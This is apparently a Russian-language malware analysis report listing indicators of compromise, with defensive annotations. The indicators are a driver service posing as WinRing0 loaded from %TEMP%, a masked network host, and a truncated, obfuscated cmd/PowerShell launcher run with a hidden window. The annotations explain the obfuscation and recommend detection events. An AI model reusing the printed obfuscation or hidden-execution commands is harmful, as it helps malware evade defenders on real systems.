Техническая информация
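- [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%TEMP%\lxvobfihqdgq.sys'
- 'WinRing0_1_2_0' %TEMP%\lxvobfihqdgq.sys
  Примечание: обе записи описывают одну и ту же службу драйвера. Её имя совпадает с именем драйвера WinRing0 (низкоуровневый доступ к оборудованию), а образ .sys лежит в %TEMP% под, по-видимому, случайным именем, что нетипично для драйвера ядра. Для обнаружения полезно отслеживать установку служб (событие 7045 журнала System), у которых ImagePath указывает на каталог, доступный пользователю для записи.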
- %WINDIR%\explorer.exe
- %TEMP%\lxvobfihqdgq.sys
- %WINDIR%\temp\udd60be.tmp
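- 'po##.#ashvault.pro':443
- 'po##.#ashvault.pro':443
- DNS ASK po##.#ashvault.pro
  Примечание: символы '#' в имени узла, по-видимому, являются маской, поставленной источником отчёта. В таком виде строка не является точным индикатором и не годится для сопоставления по точному совпадению. Из записей видно только то, что имя разрешалось через DNS и что соединения шли на порт 443.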
- '<SYSTEM32>\cmd.exe' /K <PATH_SAMPLE>.bat
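- '<SYSTEM32>\cmd.exe' /S /D /c" echo $host.UI.RawUI.WindowTitle='<PATH_SAMPLE>.bat';$thMl='ElVvdTemVvdTeVvdTntVvdTAtVvdT'.Replace('VvdT', ''),'CEHJyhaEHJyngeEHJyExEHJyteEHJynEHJysioEHJynEHJy'.Replace('EHJy', ''),'De...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden
  Примечание: командная строка cmd.exe в отчёте обрезана («...»), поэтому полный текст сценария отсюда восстановить нельзя. В видимой части строки собираются удалением вставленных подстрок через .Replace: первые две дают 'ElementAt' и 'ChangeExtension', то есть имена методов скрыты от простого поиска по тексту. Параметр -w hidden — сокращение от -WindowStyle Hidden (запуск PowerShell без видимого окна). Чтобы увидеть сценарий целиком, нужны аудит создания процессов с записью полной командной строки и журналирование блоков сценариев PowerShell (событие 4104).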
- '%WINDIR%\explorer.exe'